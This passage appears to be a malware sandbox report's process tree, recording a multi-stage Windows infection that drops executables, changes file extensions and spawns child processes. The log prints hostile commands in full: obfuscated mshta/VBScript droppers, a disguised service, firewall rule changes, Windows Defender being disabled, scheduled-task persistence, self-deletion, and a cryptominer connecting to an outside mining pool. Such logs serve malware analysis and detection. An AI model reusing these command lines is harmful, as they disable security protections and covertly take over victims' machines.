                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:5672
                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:6032
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4659514.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4659514.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4792
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3071620.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3071620.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:5676
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8367374.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8367374.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3816
                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:5968
                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:4600
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_2.exe
                                                                                                                                                                                        sonia_2.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:3364
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_3.exe
                                                                                                                                                                                        sonia_3.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                        PID:2152
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 1284
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4992
                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:3832
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4108
                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          PID:5608
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5628
                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:5704
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:5676
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                            PID:5896
                                                                                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                            PID:4416
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3DE0.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3DE0.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5988
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6E76.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6E76.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:4768
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CD50.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CD50.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5004
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4460
                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3D42.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3D42.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5748
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4DDD.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4DDD.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5052
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5EC6.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5EC6.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6F13.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6F13.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:380
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          PID:4204
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            PID:5140
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:6016
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BE2E.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BE2E.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\BE2E.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Modifies extensions of user files
                                                                                                                                                                                                                PID:576
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build2.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build2.exe"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                  PID:2844
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build2.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build2.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    PID:408
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build3.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build3.exe"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                  PID:5172
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build3.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\69a6d8d2-7151-4f6a-9636-c3072ea86bc1\build3.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:3616
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:4856
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BF86.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BF86.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:5004
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\evvuweub\
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5840
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zujtydvt.exe" C:\Windows\SysWOW64\evvuweub\
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5428
                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create evvuweub binPath= "C:\Windows\SysWOW64\evvuweub\zujtydvt.exe /d\"C:\Users\Admin\AppData\Local\Temp\BF86.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5520
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description evvuweub "wifi internet conection"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5048
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start evvuweub
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6008
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6112
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C42B.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C42B.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4800
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\C42B.exe"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF """" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\C42B.exe"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5044
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\C42B.exe" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "" == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\C42B.exe" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1944
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE
                                                                                                                                                                                                                                    ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:3832
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF ""/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ "" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:736
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ " == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:2244
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScriPt: CLosE ( CReATEoBJECT ( "WScRiPT.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = ""MZ"" > c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A + EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q * " , 0 , tRUE ) )
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:5668
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = "MZ" >c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A +EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q *
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:4228
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5960
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>c2Y3YxsZ.M9Z"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4832
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                        regsvr32 ..\BkZz.p /u -S
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:4344
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /IM "C42B.exe" -F
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:5384
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C64F.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C64F.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:4640
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im C64F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C64F.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:5736
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:5256
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /im C64F.exe /f
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                    PID:3972
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CBED.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CBED.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                PID:5312
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CBED.exe
                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CBED.exe
                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4948
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F4E3.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F4E3.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    PID:2504
                                                                                                                                                                                                                                                    • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5976
                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:4960
                                                                                                                                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        PID:5920
                                                                                                                                                                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                                                                        • C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                          "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5428
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5452
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5356
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5260
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\evvuweub\zujtydvt.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\evvuweub\zujtydvt.exe /d"C:\Users\Admin\AppData\Local\Temp\BF86.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                  svchost.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  PID:5276
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:6016
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5848
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5816
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:1792
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                        PID:4120
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        PID:5748
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4808
                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:4268
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\13BA.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\13BA.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 13BA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\13BA.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4636
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                    taskkill /im 13BA.exe /f
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                    PID:3380
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                    3⤵
